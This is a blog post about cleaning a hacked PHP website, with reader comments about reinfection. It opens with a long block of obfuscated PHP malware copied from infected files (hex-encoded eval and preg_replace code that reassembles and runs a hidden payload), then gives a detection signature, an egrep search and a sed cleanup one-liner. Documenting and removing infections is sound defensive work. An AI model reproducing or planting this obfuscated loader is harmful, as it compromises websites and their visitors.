5c%x7860ftsbqA7>q%x5c%x78256<%@error_reporting(0); preg_replace(”%x2f%50%x2e%52%x29%57%x65″,”%x65%f#p#%x5c%x782f%x5c%x78y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!277]y72]265]y39]274]y85]273]yut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%uvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782c%x785c%x5c%x7825j:.25c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x7%x7825j^%x5c%x7824-%x5c%x7824tvctu825%x5c%x787f!~!<##!>!2p%72]y3d]51]y35]274]y4:]82]y3:]87f;!osvufs}w;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudo5c%x7825!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw6<*K)ftpmdXA6|7**f#<!%x5c%x7825tww!>!%x5c%x78247860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}c%x7824-%x5c%x7824-!%25:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%xc%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x7825!*##>febfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x5c%x7825w6Z6<.2%x5c%x78-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x78K9]78]K5]53]Kc#<%x5c78257;utpI#7>%x5c%x782p%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]!#]y3d]51]y35]256]y76]Y#%x5c%x785cq%x5c%x7825%x5c%x7827Y%x5c%x7%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofx5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x78253]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464]225tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M5b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x782-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%x77ftbc%x5c%x787f!|!*uyfu%xw!>!#]y84]275]y83]273]y76]277#<%x5c%x782*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%x5c%x78604%x5c%x78×7827pd%x5c%x78256<pd%x5c%x7825w6Z6c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVM?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]x5c%x7860QIQ&f_UTPI%x]#-bubE{h%x5c%x7825)tpqsut>j%xc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7825197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU825)ufttj%x5c%x7822)gj6<^#825=*h%x5c%x7825)m%x%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npdw2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5c%x7857>%x5c%x782f7&6|7**111127-K)ebfsX%x5c166%x61%154%x28%151%x6%x5c%x7860msvd},;uqpuft%x5c%x7860msfjfgg($n){return chr(ord($n)-1);} dovg)!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|7825)}.;%x5c%x7860UQPMSV/(.*)/epreg_replacelaqkwkyork’; $swhqbixqqb = explode(chr((208-164)),’668,35,7326,55,1056,59,3462,69,2882,27,4107,67,6304,38,9229,52,67,67,1625,59,2785,33,8582,27,214,58,5854,60,4496,64,7867,26,8984,38,4426,70,5259,33,4005,22,907,57,4241,27,5346,39,2677,21,9878,50,1316,56,9613,63,4927,22,6603,50,1684,33,8932,52,2448,29,8441,60,1955,26,4690,62,9193,36,3420,42,8824,49,7056,39,996,60,5059,35,4781,39,2930,52,9456,70,9076,58,1276,40,7735,43,7412,34,464,28,7893,33,8330,67,773,27,523,28,3731,28,6066,46,7778,38,5721,21,6865,54,7219,56,4752,29,9968,38,4174,67,3811,50,1372,67,162,52,6764,62,349,38,1871,63,8248,58,1256,20,3941,64,7679,56,8178,70,9710,60,8704,27,1210,46,1717,68,7126,43,8501,27,1934,21,2698,26,4560,52,1510,60,9676,34,7573,23,1154,56,2649,28,6398,39,2549,24,5422,32,6178,65,134,28,7659,20,9399,27,8657,47,8306,24,1570,55,6437,45,2982,42,2573,47,5937,70,6139,39,5561,68,1785,20,7973,21,4406,20,492,31,964,32,7994,67,3759,52,5292,54,2003,38,9426,30,5094,50,634,34,7446,43,4970,28,9305,29,6954,21,8061,52,444,20,4612,27,6826,39,7095,31,1462,48,9557,56,2620,29,7275,51,8757,67,6919,35,5144,28,3321,57,4858,25,6112,27,7381,31,10040,66,2385,63,7816,51,5491,70,3637,61,9134,59,2724,61,579,21,2272,53,2477,23,8528,54,6036,30,6731,33,5686,35,1805,25,6369,29,9281,24,4386,20,9334,65,4998,61,2107,43,5829,25,6506,34,3576,61,4027,22,3861,42,3270,51,10006,34,6975,21,3236,34,3531,45,3698,33,5742,35,3191,45,2500,49,4883,44,2150,54,3024,47,6342,27,800,56,5454,37,6709,22,4949,21,5777,52,2818,64,3141,28,4049,58,6007,29,6653,56,3378,34,2204,68,7489,51,4639,51,9928,40,2909,21,856,26,5914,23,1115,39,7926,47,3169,22,8397,44,6243,61,4342,44,9770,67,387,57,3903,38,5172,41,7169,50,7540,33,9022,54,6482,24,8731,26,703,70,7596,63,8609,48,4268,40,1439,23,0,67,5213,46,551,28,600,34,8113,65,882,25,8873,59,5385,37,2325,60,328,21,5629,57,6540,63,1981,22,272,56,1830,41,6996,60,4820,38,9526,31,2041,66,3071,70,9837,41,4308,34,3412,8′); $faptyzynrt=substr($xcaudxkspk,(36491-26385),(30-23));explode(chr((222-178)),’7136,22,5230,37,5563,29,3206,63,10002,34,7525,68,9945,22,6686,33,2081,56,5331,35,7158,55,1851,57,2867,62,3692,22,9387,35,1725,29,6805,69,8482,23,410,28,2502,22,763,32,5515,28,3054,59,9907,38,3000,54,1205,42,8663,22,8127,51,8178,60,9708,50,6625,36,8505,68,1436,68,4518,57,2697,51,5629,32,1171,34,4107,63,9758,26,8816,41,7484,41,8901,37,5736,29,5890,33,6193,67,558,52,7114,22,2748,62,5543,20,6719,60,7752,47,2629,68,1401,35,8857,44,3664,28,610,69,10082,24,7240,22,9967,35,1311,32,6661,25,8009,66,1537,27,10036,46,2016,42,5366,30,990,52,2524,46,7712,40,5396,26,9627,30,8075,52,2417,51,3420,41,5206,24,4926,26,7433,51,3908,56,795,38,4170,28,3579,40,3964,25,7955,25,1504,33,2189,55,2058,23,5710,26,8685,41,9804,48,2348,69,341,69,3885,23,6928,56,4058,49,4267,46,191,39,159,32,2280,23,7316,51,1122,49,532,26,6582,43,9606,21,4026,32,3845,40,3989,37,6043,28,8386,46,6355,62,5292,39,4486,32,9252,25,7879,42,7367,31,6141,52,5126,52,833,40,3269,34,3355,33,53,54,3182,24,9317,70,3619,45,7213,27,230,62,2137,52,4198,69,4952,65,4456,30,724,39,1564,60,8432,50,8268,48,2468,34,5467,48,7083,31,8573,70,7026,57,9558,48,7683,29,6417,63,3113,69,9277,40,6260,65,8238,30,4860,38,3461,27,5868,22,8337,49,1624,47,6779,26,5789,24,9784,20,0,53,5178,28,4424,32,6984,42,4313,59,6874,54,1276,35,8938,65,4898,28,8316,21,5017,69,7921,34,4575,54,4659,27,7262,54,2971,29,679,45,3785,60,292,49,895,59,7398,35,1042,36,3752,33,9422,68,8794,22,7980,29,4791,69,1816,35,2929,42,1247,29,5813,29,6325,30,4686,57,1671,54,3488,33,5267,25,954,36,5842,26,5592,37,9206,46,1343,58,3388,32,6480,48,5086,40,8726,68,8643,20,107,52,873,22,438,65,5765,24,1754,41,503,29,1962,54,2570,59,6528,54,1908,54,4629,30,9003,66,1078,44,7799,59,3303,52,5978,65,9137,69,5923,55,1795,21,7858,21,3714,38,4372,52,9657,51,2303,45,7593,22,6071,70,9852,55,5422,45,9069,68,9490,68,2810,57,7615,68,2244,36,5661,49,4743,48,3521,58′); $hygsptewnv=substr($intygvhpad,(68724-58618),(27-20)); if (!function_exists(’dzdykdapjx’))(!function_exists(’qgefvbbbeh’)) { function dzdykdapjx($iirlbjafoq, $yzupjbekgp)qgefvbbbeh($tzeljmdfmc, $yxuogarznu) { $wiznxwlvkn$ylbcpzwxzw = NULL; for($lvifcrsvkz=0;$lvifcrsvkz<(sizeof($iirlbjafoq)/2);$lvifcrsvkz++)for($jzkpqbmdpb=0;$jzkpqbmdpb<(sizeof($tzeljmdfmc)/2);$jzkpqbmdpb++) { $wiznxwlvkn$ylbcpzwxzw .= substr($yzupjbekgp, $iirlbjafoq[($lvifcrsvkz*2)],$iirlbjafoq[($lvifcrsvkz*2)+1]);substr($yxuogarznu, $tzeljmdfmc[($jzkpqbmdpb*2)],$tzeljmdfmc[($jzkpqbmdpb*2)+1]); } return $wiznxwlvkn;$ylbcpzwxzw; };} $wxnlzvtcsp=”\x20\57\x2a\40\x6b\162\x67\155\x6f\163\x69\156\x6d\143\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\60\x37\55\x31\67\x30\51\x29\54\x20\143\x68\162\x28\50\x35\65\x31\55\x34\65\x39\51\x29\54\x20\144\x7a\144\x79\153\x64\141\x70\152\x78\50\x24\154\x61\146\x65\172\x63\145\x68\150\x64\54\x24\170\x63\141\x75\144\x78\153\x73\160\x6b\51\x29\51\x3b\40\x2f\52\x20\172\x70\162\x79\157\x67\161\x76\153\x77\40\x2a\57\x20″; $cxvsbyhuqr=substr($xcaudxkspk,(32792-22679),(53-41)); $cxvsbyhuqr($faptyzynrt, $wxnlzvtcsp,$fetzsqsnzm=”\x20\57\x2a\40\x73\152\x63\171\x6f\143\x73\163\x67\152\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x32\55\x31\71\x35\51\x29\54\x20\143\x68\162\x28\50\x33\62\x35\55\x32\63\x33\51\x29\54\x20\161\x67\145\x66\166\x62\142\x62\145\x68\50\x24\163\x77\150\x71\142\x69\170\x71\161\x62\54\x24\151\x6e\164\x79\147\x76\150\x70\141\x64\51\x29\51\x3b\40\x2f\52\x20\147\x6c\161\x71\161\x73\141\x73\152\x73\40\x2a\57\x20″; $ckixkiunxy=substr($intygvhpad,(63147-53034),(69-57)); $ckixkiunxy($hygsptewnv, $fetzsqsnzm, NULL); $cxvsbyhuqr=$wxnlzvtcsp; $cxvsbyhuqr=(493-372); $xcaudxkspk=$cxvsbyhuqr-1;$ckixkiunxy=$fetzsqsnzm; $ckixkiunxy=(428-307); $intygvhpad=$ckixkiunxy-1; ?><?php

As you can see from looking at the diff, there is indeed a common signature:

$GLOBALS[“%x61%156%x75%156%x61”]=1

Next, I tried to see if the signature comes up in more files:

egrep -irl '%x61%156%x75%156%x61' ./

The result confirmed my suspicion of a common signature. So next up came the question on how to clean the contaminated files. I build the following code and tested it on one file:

sed -i -e "1s/.*/<?php/"

This command replaces the first line of a file with the following content:

<?php

So next, I combined what I had into the following one-liner:

egrep -irl '%x61%156%x75%156%x61' ./ |xargs sed -i -e "1s/.*/<?php/"

The code is recursively searching for files with the signature. It starts in the current working directory and replaces the first line of affected files with <?php

However, this code has problems with theme files, as a lot of .php files do not start off with the same line. So I cleaned up the theme files manually. Whilst this brought back the functionality of the site, I would strongly recommend to harden the security of the entire site and server. Unfortunately I noticed several things while having a first look on the community’s site.

Don't miss my new posts
If you sign up to my newsletter, I will send you an email next time I publish a post.

Born in 1975. I grew up in Germany and spent a few years in Austin, Texas, my second home away from home. I hold a Master's degree in Political Science and Linguistics.

  • This is really important and thus I am posting it as the first comment: Simply cleaning up a website from a hack will never protect it from follow-up hacks. You’ll need to have a forensic analysis done on the site and have someone run a security audit on the site and server. Further on, your site should be monitored continuously by a real human. For all of these tasks I am available for assistance. Contact me for further details and assistance.

  • I’ve the same problem on my company website evermind . it
    Even after deleting all the php files in it, it continues to be hacked .. do you know where the vulnerability is?

    • I have not been able to get ahold of an access log of a hacked site yet. They are also modifying the timestamp of the contaminated files, though the real timestamp is really easy to find out. The site I only cleaned up was hacked again this morning just after 4am. Their provider only lets them see their access_log with a 24 hour delay by default. I have asked them to request today’s log file asap so we can investigate further, but they’re still waiting for a reply.

  • Pingback: Evermind down per un attacco code injection: problema risolto()

  • I ran into the same issue with some wordpress sites.
    don’t have any fresh access logs but all files modified were dated to January 22.
    But the hack was July 27 if i compare to the backups.

Share This